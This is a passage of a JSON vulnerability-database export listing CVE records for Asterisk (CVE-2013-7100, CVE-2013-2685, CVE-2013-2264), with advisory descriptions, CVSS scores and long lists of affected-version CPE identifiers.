"cpe:2.3:a:digium:asterisk:10.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc3:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc3:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.13.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.1:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:1.8.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.1:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.2:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.16.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:50:36", "description": "Buffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones before 10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to cause a denial of service (daemon crash) via a 16-bit SMS message with an odd number of bytes, which triggers an infinite loop.", "cvss3": {}, "published": "2013-12-19T22:55:00", "type": "cve", "title": "CVE-2013-7100", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2017-08-29T01:34:00", "cpe": ["cpe:/a:digium:asterisk:1.8.21.0", "cpe:/a:digium:asterisk_digiumphones:10.0.0", "cpe:/a:digium:asterisk_digiumphones:10.12.2", "cpe:/a:digium:certified_asterisk:1.8.15", "cpe:/a:digium:asterisk:11.2.0", "cpe:/a:digium:asterisk:10.12.1", "cpe:/a:digium:asterisk:11.5.0", "cpe:/a:digium:asterisk:1.8.18.1", "cpe:/a:digium:asterisk:1.8.19.0", "cpe:/a:digium:asterisk_digiumphones:10.11.0", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:asterisk_digiumphones:10.12.1", "cpe:/a:digium:asterisk:1.8.20.0", "cpe:/a:digium:asterisk:1.8.22.0", "cpe:/a:digium:asterisk:1.8.23.0", "cpe:/a:digium:asterisk:11.5.1", "cpe:/a:digium:asterisk:10.11.0", "cpe:/a:digium:asterisk:11.0.1", "cpe:/a:digium:certified_asterisk:11.2.0", "cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:10.12.2", "cpe:/a:digium:asterisk_digiumphones:10.12.0", "cpe:/a:digium:asterisk:11.4.0", "cpe:/a:digium:asterisk:10.12.0", "cpe:/a:digium:asterisk:11.0.2", "cpe:/a:digium:asterisk:1.8.17.0", "cpe:/a:digium:asterisk:1.8.18.0", "cpe:/a:digium:asterisk:11.1.2", "cpe:/a:digium:asterisk:1.8.19.1", "cpe:/a:digium:asterisk:10.10.0", "cpe:/a:digium:asterisk:11.3.0"], "id": "CVE-2013-7100", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7100", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc2:*:*:*:*:*:*", 
"cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*", 
"cpe:2.3:a:digium:certified_asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:cert1:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:38:02", "description": "Stack-based buffer overflow in res/res_format_attr_h264.c in Asterisk Open Source 11.x before 11.2.2 allows remote attackers to execute arbitrary code via a long sprop-parameter-sets H.264 media attribute in a SIP Session Description Protocol (SDP) header.", "cvss3": {}, "published": "2013-04-01T16:55:00", "type": "cve", "title": "CVE-2013-2685", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2685"], "modified": "2013-04-02T04:00:00", "cpe": ["cpe:/a:asterisk:open_source:11.0.2", "cpe:/a:asterisk:open_source:11.2.0", "cpe:/a:asterisk:open_source:11.0.1", "cpe:/a:asterisk:open_source:11.1.1", "cpe:/a:asterisk:open_source:11.2.1", "cpe:/a:asterisk:open_source:11.1.0", "cpe:/a:asterisk:open_source:11.1.2", "cpe:/a:asterisk:open_source:11.0.0"], "id": "CVE-2013-2685", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2685", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:asterisk:open_source:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:asterisk:open_source:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:29:58", "description": "The SIP channel driver in Asterisk Open Source 1.8.x before 1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15 before 1.8.15-cert2; Asterisk Business Edition (BE) C.3.x before C.3.8.1; and Asterisk Digiumphones 10.x-digiumphones before 10.12.2-digiumphones exhibits different behavior for invalid INVITE, SUBSCRIBE, and REGISTER transactions depending on whether the user account exists, which allows remote attackers to enumerate account names by (1) reading HTTP status codes, (2) reading additional text in a 403 (aka Forbidden) response, or (3) observing whether certain retransmissions occur.", "cvss3": {}, "published": "2013-04-01T16:55:00", "type": "cve", "title": "CVE-2013-2264", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264"], "modified": "2013-04-01T16:55:00", "cpe": ["cpe:/a:asterisk:open_source:11.0.2", "cpe:/a:asterisk:digiumphones:10.6.0", "cpe:/a:asterisk:open_source:1.8.7.2", "cpe:/a:asterisk:open_source:1.8.9.2", 
"cpe:/a:asterisk:open_source:1.8.3.2", "cpe:/a:asterisk:open_source:10.1.0", "cpe:/a:asterisk:open_source:1.8.18.0", "cpe:/a:asterisk:open_source:11.2.0", "cpe:/a:asterisk:digiumphones:10.12.1", "cpe:/a:asterisk:open_source:1.8.14.1", "cpe:/a:asterisk:open_source:10.1.1", "cpe:/a:asterisk:open_source:1.8.16.0", "cpe:/a:asterisk:open_source:1.8.10.0", "cpe:/a:asterisk:open_source:1.8.4.1", "cpe:/a:asterisk:digiumphones:10.11.0", "cpe:/a:asterisk:open_source:10.0.0", "cpe:/a:asterisk:open_source:1.8.1", "cpe:/a:asterisk:digiumphones:10.0.0", "cpe:/a:asterisk:digiumphones:10.3.0", "cpe:/a:asterisk:digiumphones:10.2.0", "cpe:/a:asterisk:open_source:1.8.4.2", "cpe:/a:asterisk:open_source:1.8.7.0", "cpe:/a:asterisk:digiumphones:10.9.0", "cpe:/a:asterisk:open_source:11.0.0", "cpe:/a:asterisk:open_source:10.2.0", "cpe:/a:asterisk:open_source:10.5.0", "cpe:/a:asterisk:open_source:11.2.1", "cpe:/a:asterisk:open_source:10.4.1", "cpe:/a:asterisk:open_source:1.8.4.4", "cpe:/a:asterisk:open_source:1.8.4", "cpe:/a:asterisk:open_source:1.8.2", "cpe:/a:asterisk:open_source:11.1.1", "cpe:/a:asterisk:open_source:1.8.3.1", "cpe:/a:asterisk:business_edition:c.3.3.2", "cpe:/a:asterisk:open_source:10.1.2", "cpe:/a:asterisk:open_source:1.8.8.0", "cpe:/a:asterisk:open_source:1.8.3", "cpe:/a:asterisk:open_source:1.8.12", "cpe:/a:asterisk:open_source:11.1.0", "cpe:/a:asterisk:open_source:1.8.5", "cpe:/a:asterisk:open_source:1.8.7.1", "cpe:/a:asterisk:open_source:1.8.19.1", "cpe:/a:asterisk:open_source:1.8.11.0", "cpe:/a:asterisk:open_source:10.10.1", "cpe:/a:asterisk:open_source:1.8.3.3", "cpe:/a:asterisk:open_source:1.8.2.4", "cpe:/a:asterisk:business_edition:c.3.3", "cpe:/a:asterisk:open_source:1.8.15.0", "cpe:/a:asterisk:digiumphones:10.10.0", "cpe:/a:asterisk:open_source:1.8.20.1", "cpe:/a:asterisk:open_source:10.3.1", "cpe:/a:asterisk:open_source:1.8.1.1", "cpe:/a:asterisk:open_source:10.9.0", "cpe:/a:asterisk:business_edition:c.3.2.2", "cpe:/a:asterisk:open_source:1.8.2.3", 
"cpe:/a:asterisk:open_source:10.7.1", "cpe:/a:asterisk:open_source:1.8.8.1", "cpe:/a:asterisk:open_source:10.6.0", "cpe:/a:asterisk:open_source:1.8.9.1", "cpe:/a:asterisk:digiumphones:10.1.0", "cpe:/a:asterisk:open_source:10.5.1", "cpe:/a:asterisk:open_source:10.8.0", "cpe:/a:asterisk:open_source:1.8.11.1", "cpe:/a:asterisk:open_source:10.11.0", "cpe:/a:asterisk:open_source:10.12.1", "cpe:/a:asterisk:open_source:1.8.4.3", "cpe:/a:asterisk:open_source:1.8.12.2", "cpe:/a:asterisk:open_source:1.8.1.2", "cpe:/a:asterisk:open_source:1.8.10.1", "cpe:/a:asterisk:open_source:1.8.12.1", "cpe:/a:asterisk:open_source:1.8.8.2", "cpe:/a:asterisk:open_source:1.8.12.0", "cpe:/a:asterisk:open_source:1.8.18.1", "cpe:/a:asterisk:open_source:1.8.5.0", "cpe:/a:asterisk:open_source:10.2.1", "cpe:/a:asterisk:open_source:1.8.15.1", "cpe:/a:asterisk:open_source:1.8.14.0", "cpe:/a:asterisk:open_source:10.10.0", "cpe:/a:asterisk:digiumphones:10.4.0", "cpe:/a:asterisk:certified_asterisk:1.8.15.0", "cpe:/a:asterisk:open_source:10.1.3", "cpe:/a:asterisk:open_source:1.8.13.0", "cpe:/a:asterisk:digiumphones:10.12.0", "cpe:/a:asterisk:open_source:10.4.2", "cpe:/a:asterisk:open_source:10.5.2", "cpe:/a:asterisk:open_source:1.8.13.1", "cpe:/a:asterisk:open_source:1.8.6.0", "cpe:/a:asterisk:digiumphones:10.8.0", "cpe:/a:asterisk:open_source:11.1.2", "cpe:/a:asterisk:digiumphones:10.7.0", "cpe:/a:asterisk:open_source:10.6.1", "cpe:/a:asterisk:open_source:1.8.9.3", "cpe:/a:asterisk:open_source:1.8.0", "cpe:/a:asterisk:certified_asterisk:1.8.15", "cpe:/a:asterisk:open_source:10.12.0", "cpe:/a:asterisk:open_source:1.8.17.0", "cpe:/a:asterisk:open_source:1.8.20.0", "cpe:/a:asterisk:open_source:1.8.2.2", "cpe:/a:asterisk:open_source:1.8.19.0", "cpe:/a:asterisk:open_source:1.8.2.1", "cpe:/a:asterisk:open_source:1.8.9.0", "cpe:/a:asterisk:open_source:10.4.0", "cpe:/a:asterisk:open_source:10.3.0", "cpe:/a:asterisk:open_source:11.0.1", "cpe:/a:asterisk:digiumphones:10.5.0", 
"cpe:/a:asterisk:open_source:10.0.1", "cpe:/a:asterisk:open_source:10.7.0", "cpe:/a:asterisk:open_source:10.11.1"], "id": "CVE-2013-2264", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2264", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:asterisk:open_source:1.8.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:rc3:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.1:*:*:*:*:*:*:*", 
